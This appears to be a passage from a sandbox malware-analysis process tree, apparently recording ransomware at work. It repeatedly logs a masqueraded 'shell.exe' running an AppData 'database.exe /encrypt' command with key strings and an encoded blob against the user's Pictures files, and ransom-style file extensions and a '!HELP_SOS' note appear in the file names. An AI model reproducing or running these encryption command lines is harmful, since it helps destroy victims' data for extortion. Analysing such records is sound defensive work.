                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\!HELP_SOS.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4600
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ApproveCheckpoint.emf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\CheckpointRegister.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5696
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ClearEdit.tiff.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\CompressAssert.pcx.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\DenyBlock.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4932
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\desktop.ini.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:4304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\EnableWait.dxf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\GroupRedo.raw.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2104
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\LimitExport.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1116
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\LockPublish.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\MergeReset.emf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\My Wallpaper.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\NewResolve.gif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\OutRestore.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushOut.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:580
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushRepair.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
